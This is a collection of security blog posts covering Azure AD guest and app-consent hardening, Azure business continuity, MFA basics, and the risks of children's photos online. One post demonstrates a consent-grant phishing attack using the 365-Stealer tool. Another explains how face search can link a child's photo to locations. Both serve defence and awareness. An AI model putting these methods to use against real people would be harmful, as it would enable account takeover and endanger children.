    Didier Stevens shares in this blog post how to detect Dynamic Data Exchange, an old technology often abused to weaponize MS Office documents. We believe sharing tips and detection rules like this one makes us all more secure in the end! (Read more)

  6. Under the hood: Hiding data in JPEG images
    In this lighthearted blog post, we dive under the hood of how you can hide your secrets inside a JPEG file. We recommend using this as a party trick or as a fun challenge, not for your TLP Red stuff! (Read more)



Enforce Zero Trust in Microsoft 365 – Part 2: Protect against external users and applications

12 May 2023 at 07:00
Enforce Zero Trust in Microsoft 365 - Part 2: Protect against external users and applications

In the first blog post of this series, we have seen how strong authentication, i.e., Multi-Factor Authentication (MFA), could be enforced for users using a free Azure Active Directory subscription within the Microsoft 365 environment.

In this blog post, we will continue to harden the configuration of our Azure AD tenant to enforce Zero Trust security without any license requirement. Specifically, we will see how our organization can protect against external users and prevent malicious applications from accessing our tenant.

Previous blog post:

Settings hardening

Because some default settings in Azure Active Directory are not secure and might introduce security issues within our organization, I wanted to quickly go over them and see how they could be used by malicious actors.

Guest users

We haven’t discussed guest users for now. It is because access control for guest users can’t be enforced using an Azure AD free license. However, guest users might be the entry door for attackers to access our Microsoft 365 environment. Indeed, by compromising a user in a partner’s environment, adversaries will directly gain access to our environment because of this implicit trust relationship that is automatically setup when inviting guest users. Therefore, we can either assume that guest users are correctly protected in their home tenant (we will see in a later blog post that even if guest users have the appropriate security controls enforced in their home tenant, these security controls might not be enforced in certain circumstances to access our tenant (i.e., the resource tenant)), or restrict or disable guest user invitations. In any case, the way guest users will be managed is an important consideration for our Zero Trust approach. In our case, we will not simply block guest user invites because we think that collaboration with external parties is an important aspect for our business and will be required. Therefore, we want to take a proactive approach to this problem by setting a solid foundation before it is too late.

First, we want to ensure that no one in the organization, except authorized users, can invite guest users. Indeed, by default, all users in our organization, including guest users, can invite other guest users. This could represent a serious weakness in our Zero Trust approach. Therefore, we will only allow users assigned to specific administrator roles to invite guest users (this includes the Global Administrators, User Administrators and Guest Inviters roles).

Guest invite restrictions are configured in Azure AD. For that purpose, go to the Azure Portal > Azure Active Directory > Users > User Settings > Manage external collaboration settings under External users. Choosing the most restrictive option disables the ability to invite guest users.

Guest invite restrictions in Azure AD
Guest invite restrictions

Moreover, because our organization works with defined partners, users should only be able to collaborate with them. We can therefore further restrict invitations by specifying domains in the collaboration restrictions settings:

Collaboration restrictions
Collaboration restrictions

For those restrictions, a reliant process is required to clearly define who can manage guest users and external domains, especially if you regularly collaborate with different partners.

By default, guest users have extensive permissions. If an attacker takes over a guest account, the information to which the guest user has access, may be used for advanced attacks on our company. For this reason, we want to restrict them as much as possible. It might not be required for guest users to be able to enumerate resources in our Azure Active Directory tenant. This could allow adversaries, that compromised a guest user, to gain information on users within our tenant such as viewing our employees for sending (consent) phishing emails to gain initial access or viewing other partners to deceive them by impersonating our company or an employee. Therefore, we want to limit guest users permissions.

Guest user access restrictions in Azure AD
Guest user access restrictions

With these restrictions implemented for guest users, we have already decreased the potential impact that a compromised guest user could have in our environment. However, remember that with the current configuration, specific access controls, such as strong authentication for guest users, are not enforced to access our tenant. This means that a compromised guest user might still be used to access our environment.

External applications

In Azure Active Directory, applications can be integrated into Azure Active Directory to make them accessible to user. There are many types of applications that can be made accessible through Azure AD such as cloud applications, also known as pre-integrated applications, like Office 365, the Azure Portal, Salesforce, etc., custom applications, and on-premises applications.

Users can consent to applications to allow these applications to access organization data or a protected resource in the tenant on their behalf. Indeed, applications can request API permissions so that they can work properly. These API permissions include accessing a user’s profile, a user’s mailbox content, sending emails, etc. This can also be seen as an entry door for adversaries to gain access to information in our environment. For example, attackers could trick an employee by sending a consent link (consent phishing) to an employee for a malicious application. If the user consents, attackers would have the permissions the user has consented to. Even worse, an administrator might consent to an application for the entire organization. This means that a malicious application could potentially gain access to all directory objects.

Let’s abuse it!

If user consent is allowed in our Azure AD tenant, adversaries could send consent grant phishing to employees. Let’s see how this could be done.

First, because adversaries could access our Azure AD tenant because guest invitation restrictions were initially not configured, they could gather a list of our employees as well as their email address. Then, they used this list to create a phishing campaign for a Microsoft Advertising Certification study guide.

Phishing email
Phishing email

Because one employee was very eager to try out this new limited edition guide, they clicked the link and signed in with their credentials.

Application permissions request
Permission consent

Unfortunately, the employee had administrative permission in our tenant and could therefore grant consent on behalf of the entire organization. Everyone should benefit from this free offer, right?… Not really, no. Indeed, as shown in the above screenshot the application, which is not verified, requires a lot of access such as sending and viewing emails, read and write access to mailbox settings, and read access to notes, files, etc.

Once the user clicks, adversaries can retrieve information about the user as well as from the organization. Additionally, they can access the user’s mailbox, OneDrive files and notes.

For this demonstration, I used 365-Stealer from AlteredSecurity to setup the phishing page and to access users in the directory:

Phished users in 365-Stealer
365-Stealer

How to protect ourselves against consent grant phishing?

There are no bullet proof solutions to protect users from phishing, unless you disable the ability for users to receive emails and messages globally, which is very far from ideal. Indeed, even with Office 365 threat policies, such as anti-phishing policies, and user awareness, malicious actors are always finding new ways of bypassing these polices and tricking users. However, what we can do is disabling the ability to consent for applications in Azure AD.

To restrict user consent for applications, it is possible to disable or restrict applications and permissions that user can consent to. Unless it is required, it is highly recommended to disable user consent. This will be done for our organization tenant to prevent consent grant attacks.

Consent and permissions for users
Consent and permissions for users

This setting can be configured in Azure Portal > Azure Active Directory > Users > User settings > Manage how end users launch and view their applications under Enterprise applications > Consent and permissions.

Besides blocking this functionality, it is also possible to only allow users to consent for permissions classified as low impact. Microsoft provides the ability to define our own classification model for application permissions, ranging from low to high as show below. In that case, administrators can select the Allow user consent for apps from verified publishers, for selected permissions (Recommended) setting in the user consent settings page:

Permission classifications for applications in Azure AD
Permission classifications for applications in Azure AD

Conclusion

In this blog post, we went over different settings in Azure AD that can be restricted to prevent malicious users from being added to our tenant. Moreover, we have seen how application consent settings can be abused through consent grant phishing and how we can protect against it.

I have selected these settings among others because we usually see that they are not restricted in most environments during our security assessments. However, configuring only these settings is not enough to protect your environment against malicious and unauthorized actions. If you would like to know more about how NVISO can help you securing your environment, feel free to reach out or to check our website.

In the next blog post, we will go over Azure AD Conditional Access policies, see how they can be used to further increase the security posture of our environment and implement our Zero Trust security approach.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

Implementing Business Continuity on Azure

5 May 2023 at 07:00

There is a general misconception among cloud consumers that the availability of their resources in the cloud is always guaranteed. This is not true since all cloud providers, including Microsoft, offer specific SLAs for their products that almost never reach an availability target of 100%. For the consumers who have deployed critical resources and applications to the cloud, reaching the company-defined targets for Business Continuity can be technically challenging and confusing. The purpose of this blog post is to provide practical guidance on how Business Continuity is expressed on the cloud, how it can be implemented for many Azure IaaS and PaaS services and what real-world problems each solution attempts to solve.

Introduction

Before we dive into the technical Azure-specific details, let’s explain what Business Continuity is and what it involves.

Business Continuity is the capability of the organization to continue the delivery of products or services at acceptable predefined levels following a disruptive incident. According to ISO 22301, business continuity is not limited only to IT and it involves many enterprise aspects.

In this blog post, we will focus on the business continuity aspects related to IT. Each of them corresponds to a specific type of SLA that you may have internally or with your customers, so there are multiple aspects of Business Continuity that may be applicable to you.

If it’s important for you to keep your services always up and running, you should focus on High Availability. This is the ability of a system to be continuously operational, or, in other words, have an uptime percentage of near 100%. It is generally achieved by implementing redundant, mirrored copies of the hardware and data, so that if one component fails, another one takes over.

If fluctuating demand and bottlenecks cause your systems to struggle, then you may need to focus on Scalability. This is the ability of a system to scale up or scale down cloud resources as needed to meet fluctuating demand. It can be considered as an aspect of Business Continuity, since peaks in demand can be the result or the cause of an incident.

Finally, to protect data that are critical to your company’s functionality and need to be always available and recoverable, you should implement Backup. This is the duplication of data to a secondary location, so that if the primary copy is harmed or becomes unavailable, data from the other location can be retrieved and the system can be rolled back to a specific point in time.

The following diagram shows an analogy between the aforementioned terms and the problems they tackle.

Business Continuity: Mapping of problems and solutions

It is important to note that the implementation of any of the controls described in this blogpost should be based on a structured business continuity assessment/plan, and should be selected based on the requirements of your environment or application. Improvident implementation of controls could result in undue costs or in inefficient protection.

Implementing High Availability

Depending on the required uptime of your application or system and the scale of disaster you need to be able to recover from, there are many ways to implement high availability in Azure. When choosing the controls that will be implemented in your environment, you should always consider that the availability in a chain of resources is determined by the weakest link in the chain. For example, in the case of an application composed by a front-end server and a database, if the web server is spread across multiple availability zones but the database is single-instance, the whole application will not be available anymore if the availability zone of the database goes down. Having the above in mind, we present below the different options provided by Azure, sorted by increasing complexity and costs.

Protection against hardware failures

Small-scale technical or hardware issues may affect single-instance components. To avoid this, the component should be mirrored to a secondary hardware volume. On Azure, depending on your cloud computing state, this can be implemented as follows:

IaaS

When the component is a Virtual Machine (VM), this can be achieved by using availability sets. An availability set is a logical grouping of VMs that allows Azure to understand how your application is built to provide for redundancy and availability. While for single-instance VMs Azure guarantees a 99,9% uptime SLA, by using availability sets the uptime is increased to 99,95%. To use availability sets on Azure VMs, you need to perform the following steps:

  1. Create an availability set;
  2. Create new VMs; in the creation wizard, under “Availability options” choose “Availability set” and then select the previously created set.

Note: It is not possible to add existing VMs to an availability set after their creation.

PaaS

Azure PaaS components are protected against local hardware failures by design, guaranteeing higher uptime SLAs than IaaS. Specifically:

  • Storage Accounts: Microsoft ensures 3 instances of the service when using the default redundancy option (Locally redundant Storage – LRS). This offers an SLA of 99.999999999% (11 nines) uptime.
  • SQL Databases: By default, Microsoft ensures at least two instances of the service within the same data center, reaching 99,99% uptime.
  • Cosmos DB: By default, Microsoft provides three replicas (individual nodes) within a cluster, ensuring an SLA of 99,99% uptime.
  • App Service: Microsoft guarantees an SLA of 99.95% uptime for App Services, for tiers other than Free or Shared.

Protection against datacenter failures

To provide the option of protecting against failures that affect the whole datacenter, such as fire, power and cooling disruptions or flood, Microsoft has introduced the concept of availability zones. Availability zones are unique physical locations within an Azure region, each made up of one or more datacenters with independent power, cooling, and networking. The creation of multiple instances of services across two or more zones provides increased high availability, as it protects both against hardware and against datacenter failures.

Azure Availability Zones
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on your Cloud computing model, such protection can be achieved as follows:

IaaS

Virtual machines can be deployed across multiple availability zones to provide an uptime SLA of 99,99%. This can be done with the following steps:

  1. Create a VM; under “Availability options” select “Availability zone” and specify a zone. This will be the primary zone of your VM.
  2. Open the VM.
  3. Under Operations, select “Disaster recovery” and set the option “Disaster Recovery between Availability Zones?” to “Yes”. Under “Advanced settings” you will be able to see or change the secondary zone.
  4. Click on “Review and start replication”.

PaaS

When it comes to PaaS services, it is generally easier to deploy them across multiple availability zones. Specifically:

  • Storage Accounts:
    • Microsoft ensures 3 instances of the service across three different availability zones (Zone redundant Storage – ΖRS). This offers an SLA of 99.9999999999% (12 nines) uptime over a given year.
    • The option can be enabled during the Storage Account creation, under Basics – Redundancy.
  • SQL Databases:
    • Zone redundancy available at the General purpose, Hyperscale, Business Critical and Premium Service tiers. The SLA depends on the tier and can reach 99.995% of uptime.
    • The option can be configured during the SQL DB creation, under the Service tier selection menu, or under Settings – Compute + storage for existing databases.
  • Azure Cosmos DB Accounts:
    • Enabling zone redundancy in an Azure Cosmos DB account can increase the uptime SLA to 99.995%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Availability Zones.
  • App Service:
    • Zone redundancy is only available in either Premium v2 or Premium v3 App Service Plans for Web Apps and in Elastic P2 for Function Apps. At the time of writing, Microsoft has not published specific SLAs for zone-redundant App Services, but it guarantees at least three instances of the service.
    • The option can be enabled during the creation of the Service Plan, under Zone redundancy.

Note: It is not possible to enable availability zone support after the creation of any of the above components.

Protection against regional failures

Finally, to protect against regional failures that can affect many adjacent datacenters and can be caused by large-scale natural and man-made disasters (e.g., earthquake, tornados, war), Microsoft has introduced the concept of availability regions. Azure regions are physical regions all over the world, designed to offer protection against local disasters within availability zones and against regional or large geography disasters by making use of another region and replicating the workloads to that region. The secondary region could be considered as the disaster recovery site. Availability regions can be used independently of availability zones or in conjunction with them.

Azure Availability Regions
Source: What are Azure regions and availability zones? | Microsoft Learn

Based on the Cloud computing model of the application components that you want to protect, you have the following options:

IaaS

Virtual machines can be deployed across multiple availability regions to provide an uptime SLA of 99,99%. This capability is offered by the Azure Site Recovery service that orchestrates the replication, failover, and recovery of the VMs. Site Recovery can be implemented with the following steps:

  1. Open the VM for which you want to configure regional redundancy.
  2. Under Operations, select “Disaster recovery”, set the option “Disaster Recovery between Availability Zones?” to “No” and select a target region.
  3. Click on “Review and start replication”.

PaaS

PaaS services can be protected from regional disasters as follows:

  • Storage Accounts:
    • With the Geo redundant Storage option (GRS), Microsoft ensures that there are 3 instances of the Storage Account in the primary region and another 3 instances in the secondary region. This offers an SLA of 99.99999999999999% (16 nines) uptime over a given year. There is also the option of Geo-zone-Redundant Storage (GZRS) which spreads the instances of the primary region across 3 different availability zones, to enable fastest recovery times in case of a datacenter failure.
    • The option can be enabled under Data Management – Redundancy for an existing Storage Account.
  • SQL Databases:
    • An additional replica for read operations can be created in a secondary region and used as a disaster recovery site. The SLAs for the geo-redundant setup vary depending on the selected service tier.
    • The option can be configured for a given SQL DB, under the Service tier selection menu.
  • Azure Cosmos DB Accounts:
    • Enabling geo redundancy in an Azure Cosmos DB account can increase the SLA for read operations to 99.999%.
    • The option can be selected during the Cosmos DB Account creation, under Global Distribution – Geo-Redundancy, or for an existing Cosmos DB account under Settings – Replicate data globally.
  • App Service:
    • As of the time of writing, there is no geo-redundancy support for Azure App Service.

Before closing with High Availability, remember that a highly available system is a system that your customers and employees can rely on. It increases the credibility of your company, improves its reputation and offers peace of mind to your valuable users. Although costs may go up, depending on your implementation choices, it shall assist you to establish yourself as a trustworthy partner.

Implementing scalability

For systems whose load can abruptly increase or decrease, a problem arises: How can you guarantee the available level of resources during high periods, while at the same time keeping your costs to the minimum during the low periods? This is the essence of scaling, and in the cloud, achieving this balance is much easier than in traditional, on-premises infrastructures. There are two main ways that an application can scale: vertical scaling and horizontal scaling. Vertical scaling (scaling up) increases the capacity of a resource, for example, by increasing the VM size, CPU, memory, etc. Horizontal scaling (scaling out) adds new instances of a resource, such as VMs or database replicas.

Vertical vs horizontal scaling

While vertical scaling can be achieved more easily, and without making any changes to the application, at some point it hits a limit where the system cannot be scaled more. On the other hand, horizontal scaling is more flexible, cheaper, and applies to big, distributed workloads. It also enables autoscaling, which is the process of dynamically allocating resources to ensure performance. That is why, especially in the Cloud, horizontal scaling is the recommended option.

The options Azure provides you with are as follows:

IaaS

Scalability of Virtual Machines in Azure can be achieved through Virtual Machine Scale Sets (VMSS). These represent groups of load-balanced VMs that provide scalability to applications by automatically increasing or decreasing the number of VM instances in response to demand or a defined schedule. VMSS can be deployed into one Availability Zone, multiple Availability Zones or even regionally.

During the creation of a VMSS resource, the cloud consumer can specify the scalability options and minimum instance number, the Load Balancer (or Application Gateway, in case of HTTPS traffic) that will be used, and other networking and orchestration options.

PaaS

In most cases, managed PaaS services have horizontal scaling and autoscaling built in. The ease of scaling these services is a major advantage of using Azure PaaS services.

Specifically for App service, we should point out that the scaling options depend on the App Service plan (tier) and can reach a maximum of 100 instances when using the Isolated tier.

Implementing backups

Although HA solves the problem of small or extended failures, what happens if the unavailability of data originates from a malicious threat, such as a ransomware attack? In this case, having a highly available infrastructure will simply replicate the encrypted/corrupted files everywhere almost immediately, leaving no recovery options. Here is where the value of remote data copies, that are unaffected by real-time modifications, lies. With Azure Backup, regular backups and snapshots of workloads are taken, so that in case of unauthorized modification or deletion, the service can be restored to a specific point in time.

Backups in Azure can be implemented both for IaaS and for PaaS services, and the options are presented below.

IaaS

VM backups can be either locally redundant or zone redundant. Recovery from backups can be implemented in two ways: the standard option generates backups once a day and maintains instant restore snapshots for 2 days. The enhanced option generates multiple backups per day, maintains instant restore snapshots for 7 days and ensures that snapshots are spread across zones for increased resiliency. The second option applies to VMs of high criticality.

In an existing Azure VM, Backups can be configured under Operations – Backup.

PaaS

Multiple backup options also exist for different PaaS services:

  • Storage Accounts:
    • Azure provides the option to configure operational backups of the blobs of a Storage Account.  This is a local backup solution that maintains data for a specified duration in the source storage account itself. Although a Backup Vault is required to manage the backup, there is no copy of the data stored in the Vault. The backup is continuous and allows the reversion to a specific point in time in case of data corruption.
    • The option can be configured under Data management – Data protection for existing Storage Accounts, by selecting the checkbox “Enable operational backup with Azure Backup” and following the necessary steps presented in the portal.
  • SQL Databases:
    • Azure gives the option of locally redundant, zone-redundant or geo-redundant backups.
    • Configuration can be performed with the option “Backup storage redundancy” under Settings – Compute + storage for existing databases, or under Basics – “Backup storage redundancy” during the database creation.
  • Azure Cosmos DB Accounts:
    • Two options are offered for backup functionality, either periodic (LRS or ZRS or GRS) or continuous backup. When using the periodic backup mode, which is the default one for all accounts, backups are taken at periodic intervals and the data can only be restored by creating a request with Microsoft’s support team. On the contrary, continuous backup facilitates the restoration to any point of time within either 7 or 30 days (depending on the tier) through the portal.
    • Can be configured under “Backup Policy” during creation, or under the “Backup & Restore” pane for existing accounts.
  • App Service:
    • Azure provides the possibility to backup an App’s content, configuration and database by enabling and scheduling periodic backups, which are stored in a Storage Account.
    • Backup and restoration options can be configured under Settings – Backups for existing App Services.

Overall, it is important to find the balance between the frequency of backups and the amount of maintained past snapshots, in order to lose as less data as possible in case of an incident, be able to revert to a healthy past state and at the same time maintain costs to an acceptable level for your company.

Conclusion

To conclude, it all ends up to one question: Can you survive? Can you recover from disasters as small as power interruptions to as big as pandemics and earthquakes? Business Continuity is the key to the answer. And in the modern, distributed Cloud world, all the capabilities are there – it’s just up to you, your dedication and commitment to implement the ones that are essential to your business.

Elpida Rouka

Elpida is an Information Security Consultant, with expertise in Azure/O365 Security, SIEM, Identity & Access management, Risk management, Information Security Management Systems (ISMS) and Business Continuity planning (ISO22301). She is always eager to create innovative high-quality solutions that precisely meet business needs.

Stijn Wellens

Stijn is a manager with experience in cloud and network security. He is Solution Lead for Cloud Security Assessments and Microsoft Cloud Security Engineering at NVISO. Besides the technical challenges during Azure and Microsoft 365 security roadmap implementations, Stijn enjoys coaching the teams by sharing his knowledge and experience.

Enforce Zero Trust in Microsoft 365 – Part 1: Setting the basics

2 May 2023 at 07:00

This first blog post is part of a series of blog posts related to the implementation of Zero Trust approach in Microsoft 365. This series will first cover the basics and then deep dive into the different features such as Azure Active Directory (Azure AD) Conditional Access policies, Microsoft Defender for Cloud Apps policies, Information Protection and Microsoft Endpoint Manager, to only cite a few.

In this first part, we will go over the basics that can be implemented in a Microsoft 365 environment to get started with Zero Trust. For the purpose of the blog post, we will assume that our organization decided to migrate to the cloud. We just started investigating what are the quick wins that can be easily implemented, what are the features that will need to be configured to ensure security of identities and data, and what the more advanced features that could be used to meet specific use cases would be.

Of course, the journey to implement Zero Trust is not an easy one. Some important decisions will need to be made to ensure the relevant features are being used and correctly configured according to your business, compliance, and governance requirements without impacting user productivity. Therefore, the goal of this series of blog posts is to introduce you possible approaches to Zero Trust security in Microsoft 365.

Introduction

However, before starting we need to set the scene by quickly going over some principles.

First, what is a Zero Trust security approach? Well, this security model says that you should never trust anyone and that each request should be verified regardless of where the request originates or what the accessed resource is. In other words, this model will assume that each request comes from an uncontrolled or compromised network. Microsoft provides this nice illustration to represent the primary elements that contribute to Zero Trust in a Microsoft 365 environment:

Zero Trust approach in Microsoft 365
Zero Trust approach in Microsoft 365

We will go over these components as part of this blog post series.

You may wonder why I have decided to discuss Zero Trust in Microsoft 365. Because I think it is one of the most, if not the most, important aspects of a cloud environment. Indeed, with cloud environments, identities are considered as the new perimeter as these identities can be used to access Internet-facing administrative portals and applications from any Internet-connected device. 

Furthermore, even when security controls are enforced, it does not mean that the environment is secure. There were many attacks these past few months/years that allowed attackers to bypass security controls through social engineering, and phishing attacks, for example. Therefore, the goal is more to reduce the potential impact of a security breach on the environment than to prevent attacks from succeeding.

Finally, let’s go over some Microsoft 365 principles. When an organization signs up for a subscription of Microsoft 365, an Azure AD tenant is created as part of the underlying services. For data residency requirements, Microsoft lets you choose the logical region where you want to deploy your instance of Azure AD. This region will determine the location of the data center where your data will be stored. Moreover, Microsoft 365 uses Azure AD to manage user identities. Azure AD offers the possibility to integrate with an on-premises Active Directory Domains Services (AD DS) but also to manage integrated applications. Therefore, you should/must/have to understand that most of the work to set up a Zero Trust approach will be done in Azure AD.

Let’s get started!

Our organization just bought a paid Microsoft 365 subscription which comes with a free subscription to Microsoft Azure AD. The free Azure AD subscription includes some basic features that will allow us to get started with our journey. Let’s go over them!

Security Defaults

The first capability is the Azure AD Security Defaults. The Security Defaults are a great first step to improve the security posture by enforcing specific access controls:

  • Unified Multi-Factor Authentication (MFA) registration: All users in the tenant must register to MFA. With Security Defaults, users can only register for Azure AD Multi-Factory Authentication by using the Microsoft Authenticator app using a push notification. Note that once registered, users will have the possibility to use a verification code (Global Administrator will also have the possibility to register for phone call or SMS as second factor). Another important note is that disabling MFA methods may lead to locking users out of the tenant, including the administrator that configured the setting, if Security Defaults are being used;
  • Protection of administrators: Because users that have privileged access have increased access to an environment, users that have been assigned to specific administrator roles are required to perform MFA each time they sign in;
  • Protection of users: All users in the tenant are required to perform MFA whenever necessary. This is decided by Azure AD based on different factors such as location, device, and role. Note that this does not apply to the Azure AD Connect synchronization account in case of a hybrid deployment;
  • Block the use of Legacy Authentication Protocols: Legacy authentication protocols refer to protocols that do not support Multi-Factor Authentication. Therefore, even if a policy is configured to require MFA, users will be allowed to bypass MFA if such protocols are used. In Microsoft 365, legacy authentication is made from clients that don’t use modern authentication such as Office versions prior to Office 2013 a mail protocols such as IMAP, SMTP, or POP3;
  • Protection of privileged actions: Users that access the Azure Portal, Azure PowerShell or Azure CLI must complete MFA.

These features already allow to increase the security posture by enforcing strong authentication. Therefore, they can be considered a first step for our organization that just started to use Microsoft 365 and is still researching/evaluating/ the different possibilities.

If we want to enable Security Defaults, we go to the Azure Portal > Active Azure Directory > Properties > Manage Security Defaults:

Enable Security Defaults in Azure AD
Enabling Security Defaults

However, there are important deployment considerations to be respected before enabling Security Defaults. Indeed, it is a best practice to have emergency accounts. These accounts are usually assigned the Global Administrator role, the most privileged role in Azure AD/Microsoft 365 and are created to enable access to the environment when normal administrator accounts can’t be used. This could be the case if Azure AD MFA experiences outages. Because of the purpose of such accounts, these users should either be protected with a very strong first authentication method (e.g., strong password stored in secure location such as a physical vault that can only be accessed by a limited set of people under specific circumstances) or use a different second authentication factor than other administrators (e.g., if Azure AD MFA is used for administrator accounts used regularly, a third party MFA provider, such as hardware tokens, can be used). But here is the problem: this is not possible when using Security Defaults.

Per-user MFA settings

Note that the per-user MFA settings, also known as legacy multifactor authentication, will be deprecated on September 30th, 2024.

The second capability with an Azure AD free license is the per-user MFA settings. These settings can be used to require Multi-Factor Authentication for specific users each time they sign in. However, some exceptions are possible by turning on the ‘Remember MFA on trusted devices’. Note that when enabled this setting will allow users to mark their own personal or shared devices as trusted. This is possible, because this setting does not rely on any device management solution. Users will only be asked to reauthenticate every few days or weeks when selecting this option. The interval depends on the configuration.

We usually do not recommend using the ‘Remember MFA on trusted devices’ setting unless you do not want to use Security Defaults and do not have Azure AD Premium licenses. Indeed, this setting allows any user to trust any device, including shared and personal devices, for the specified number of days (between one and 365 days). However, these settings can be configured in the https://account.activedirectory.windowsazure.com portal.

In the user settings, MFA can be enabled for each individual user.

Per-user MFA settings in Azure AD
Per-user MFA users settings

Then, in the service settings, we can allow users to create app passwords for legacy applications that do not support MFA, select authentication methods that are available for all users, and allow or not users to remember Multi-Factor Authentication on trusted devices for a given period of time. Note that the trusted IP addresses feature requires an additional license (Azure AD Premium P1) that we do not have for the moment.

Legacy MFA settings in Azure AD
Per-user MFA service settings

Sum-up

These two features are quite different but allow us to achieve the same goal, to enforce strong authentication, i.e., MFA, for all or some users.

For our organization we will choose the Security Defaults for multiple reasons:

  • The per-user MFA settings can become unmanageable quickly. This is especially true for growingorganization.With more people and a complex environment, exceptions will be required, and it will become difficult to keep track of the configuration and keep a good baseline. Security Defaults, respectively,allow to enforce a standard baseline for all users;
  • By using per user MFA users will be prompted for MFA every time they sign in.. This badly affects user experience and productivity might be impacted;
  • Security Defaults blocks legacy authentication protocols that might be used to bypass MFA in some cases. This prevents identities, including administrators, from being targeted by brute force or password spraying attacks and help mitigating the risk of successful phishing attacks to a certain extent;
  • Multi-Factor Authentication registration is enforced with Security Defaults for all users meaning that all users will be capable of doing MFA if required.

By going that way we need to consider that exclusions are not possible. Therefore, emergency accounts or user accounts used as service accounts (which it is not recommended to have as they are inherently less secure than managed identities or service principals) might be blocked. Nevertheless, as we are just evaluating the Microsoft 365 products, we can accept that the environment and cloud applications are unavailable for a few hours without any major impact on business processes. However, this might be an crucial point in the future.

Finally, it is important to note that these two features do not allow to configure more granular controls as we will see later in this series.

Conclusion

In this first blog post, we have seen different possibilities to enforce access restrictions that can be implemented when an organization just starts its journey in Microsoft 365:

  • Per-user MFA settings: Allow to enforce MFA for specific users but can become quickly unmanageable and does not provide granular controls;
  • Security Defaults: Allow to enforce a strong authentication mechanism and to block legacy authentication protocols that may allow users to bypass MFA. This solution is recommended over the per-user MFA settings. However, note that MFA might not be required in most cases which is not ideal.

In brief, we can see that both solutions have limitations and will not be suitable for most organizations. Indeed, there are still many aspects, such as restricting access based on specific conditions, that are not covered by these capabilities. We will go over additional key features as well as our recommendations for the implementation of a Zero Trust approach in Microsoft 365 in future blog posts.

In the next blog post, we will see how we can protect our environment against external users and applications.

About the author

Guillaume Bossiroy

Guillaume is a Senior Security Consultant in the Cloud Security Team. His main focus is on Microsoft Azure and Microsoft 365 security where he has gained extensive knowledge during many engagements, from designing and implementing Azure AD Conditional Access policies to deploying Microsoft 365 Defender security products.

Additionally, Guillaume is also interested into DevSecOps and has obtained the GIAC Cloud Security Automation (GCSA) certification.

An Innocent Picture? How the rise of AI makes it easier to abuse photos online.

4 April 2023 at 08:15

Introduction

The topic of this blog post is not directly related to red teaming (which is my usual go-to), but something I find important personally. Last month, I gave an info session at a local elementary school to highlight the risks of public sharing of children’s pictures at school. They decided that instead of their photos being publicly accessible, changes would be implemented to restrict access to a subset of people. However, there are many more instances of excessive sharing of information online; photographers’ portfolios, youth/sports clubs, sharenting on social media, etc.

There are many risks stemming from this type of information being openly available, and the potential risks have only increased with the rise of artificial intelligence. Since you are reading this post on the NVISO blog, I’m assuming you are more cyber-aware than the average person out there and therefore perfectly positioned to use the takeaways from this post and spread the word to others. Obligatory Simpsons reference:

Since the children themselves may not have a say in the matter yet and the people who do may not be aware of the possible dangers, it’s up to us to think of the children!

Traditional Risks

When thinking of the risks linked to the presence of children’s pictures online, an obvious threat is the type of person that might drive a van like this:

There are three traditional risks we will be discussing here:

  • Kidnapping
  • Digital Kidnapping
  • Pornographic Collections

Kidnapping

How does a picture of a child pose a risk for physical kidnapping? First of all, a picture could give away a physical location, for example due to the presence of street signs/names, recognizable elements such as shops, bars, monuments, schools, etc. If this is a location frequented by the child, a possible child predator could identify an opportunity for kidnapping there.

In case no identifiable elements are present, certain people might still giveaway the location due to oversharing. Imagine a picture on a Facebook profile that is publicly accessible with comments such as “birthday party at …”, “visiting grandma & grandpa in …”, “always a fun day when we go to …”. Often-visited locations can be deduced from comments like these.

Finally, a more technical approach is looking at the picture’s metadata, which often gives information about the type of camera that was used, shutter time, lens, etc. but can also contain an exact location where the picture was taken. No additional research is required to figure out where the child has been.

Digital Kidnapping

With digital kidnapping, the victim is affected by some type of identity fraud. Pictures of the child are stolen and reused by people online on their own social media, often pretending to be related to the children. An example could be an adoption fantasy, reposting pictures of the child for likes and comments without the child or its parents knowing about this.

Another, more dangerous form of digital kidnapping consists of a sexual predator reusing the victim’s pictures to target other possible victims. Someone could pretend to be a young child themselves to lure other children into meeting with them online or sharing potentially explicit pictures.

Pornographic Collections

Continuing on the topic of potentially explicit pictures, it is not a secret that the Dark Web is full of pornographic pictures of children. However, pictures that you or I would not consider to be risky or explicit could end up in such collections as well. Holiday pictures of children in swimsuits are happily shared by child predators in an attempt to fulfill their fantasies. They search through social media to identify such pictures, sharing them among each other along with sexual fantasies. With pictures of a certain child, they might search for pictures of lookalike children to add to their fantasy. With only a textual story, they might search for pictures of children that match the story.

However, these risks have been existent for a number of years already. What’s more dangerous is that the life of a child predator looking for pictures has been facilitated with rise of artificial intelligence.

Next-gen Risks

So what is the problem with public pictures? Not only can they be retrieved by anyone browsing the web, but they can and will also be gathered by automated systems through concepts called spidering and scraping. These activities aren’t particularly nefarious and actually part of the regular functioning of the web, used by search engines for example. However, other applications can make use of these same techniques and have already done so to create massive collections of pictures, even those you would not expect to be public, such as medical records

Facial Recognition

One such example is ClearView AI, which is aimed at law enforcement by applying its facial recognition algorithm to a huge collection of facial images to help with investigative leads. However, for the broader public, a similar application has become available, allowing anyone to upload a picture and receive an overview of other pictures with matching faces. While probably having legitimate use cases, PimEyes provides people with less honorable intentions an easy way to add a high-tech touch to the traditional risks mentioned above. If you haven’t heard about PimEyes yet, it allows to upload a picture of someone’s face, after which the application will provide you with a collection of matching pictures. The tool is already quite controversial, as evidenced by the articles below:

As an example, we provided PimEyes with the face of the middle child selected from the stock photo on the left below, which resulted in a set of pictures containing the same child:

Of course, the algorithm identifies the pictures that are part of the same set of stock pictures. When trying this out with a private picture of someone, the set of results contained distinct public pictures with the same person. The algorithm was able to identify them in pictures of low quality or with the person wearing a hat or mouth mask covering a large part of the face. Scary stuff, especially considering what you could be able to do with this output:

  • Imagine a picture of a child without any hints towards the location (e.g. stolen from Facebook or other social media). Upload it to PimEyes and you might be able to link the child’s face to other public pictures where a location can easily be deducted (such as a school website for example). You now know locations where the child may frequently be present.
